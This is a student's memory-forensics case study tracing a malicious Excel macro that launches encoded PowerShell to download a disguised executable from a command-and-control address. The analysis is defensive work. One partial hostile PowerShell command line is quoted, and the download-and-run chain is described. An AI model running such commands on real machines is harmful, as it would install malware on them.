A project done when going through "Concept And Techniques For Malware Analysis" module during my university
A memory forensic case study
- Conduct the forensic in Kali Linux within a virtual environment
- Volatility are used to analyse the digital evidence of assignment1.vmem file where I have used volatile3 plugins to conduct memory forensic and any malicious document on the target for the investigation.
- CyberChef to decode a encoded command script.
- LibreOffice to open potential malicious office document to get a better overview of the incident
- VirusTotal for cross-referencing, analyses suspicious files to detect types of malware and malicious content using antivirus engines and website scanners.
You are working as a Digital Forensics Analyst as part of the Incident Response team in Advanced Cores Enterprises. You received an alert from your colleagues in the Security Operations Centre that they detected suspicious network activities originating from the computer belonging to one of the staff from the Finance department. As part of your Incident Response Procedure, you have acquired the memory image from the suspected computer. You have been tasked to perform an analysis on the memory image, assignment1.vmem , and write a report to document your findings.
• Utilizing windows.imageinfo plugin in the volatility3 utility framework,target system and device is a windows system running on an x64 architecture.
• Firstly, used “psscan” plugins to get all the processes at time of when the memory image file was acquired.
• At first glance, suspicious looking process EXCEL.EXE caught my attention. Hence, by using “grep”, to focus that process and find out on the parent process.
• To find more clues, I utilized the “cmdline” plugins and I found out that EXCEL.EXE process is used to create a file named latest_finance_accounts.xls. It became more suspicious as the victim works in the finance department hence it may be a document that is embedded with malicious macros.
• At this point of time, I made a hypothesis that the victim received an Outlook email (Outlook.exe was captured in image 1) with the “latest_finance_account” file inside which contained a malicious macro. Once the victim opens the file, it will run the script and execute the payload.
• I used “pstree” to get the child processes of it and the result shows that the excel.exe spawns a child process powershell.exe which seems even more suspicious. Furthermore, the powershell comes with a whole line of encoded script hence I conduct further investigation.
• The powershell.exe spawns another powershell.exe which spawns Excelsvc.exe. As all of the previous clues stream down to this process, I chose this process as my potential malicious target that infected the machine.
• Not much information gotten when used cmdline, getsids, handles plugins on the target process.
• Potential C2 IP address and port as it’s from the suspected process. IP address: 192.168.221.135
• “Malfind” plugin is able to capture result for the target process which helps to support my hypothesis
• To confirm whether the process is malicious, I dumped and copied the file to virustotal.
• According to VirusTotal which can concludes that the process is malicious.
• As previously found the suspicious encoded powershell script, I copied into cyberchef and decode the script.
• Looking at the malicious script, it seems to be trying to download a payload from the attacker C2 server and output the file as the excelsvc.exe to stay undetected.
• Based on the url link, the IP address matches the previous ip address.
• Conducted a quick triage using “strings” commands and multiple keyword related to cryptography was captured,maybe a ransomware incident
• Dump the excel file
• Using oletools (oleid.py), the excel file contain malicious macro.
• Olevba.py captured the malicious macro and I proceed to conduct a script analysis on the VBA script. According to the VBA, the script will run automatically when the document is open if the macro is enabled.
• Replace the declared variables with understandable names and decode all the necessary line to get a rough idea of what does the script does.
• As a result of the script analysis, the script will run automatically once the document is open and “powershell L -W 1 -C powershell - \n nc (encoded string from cell(1583,245))” command will be run.
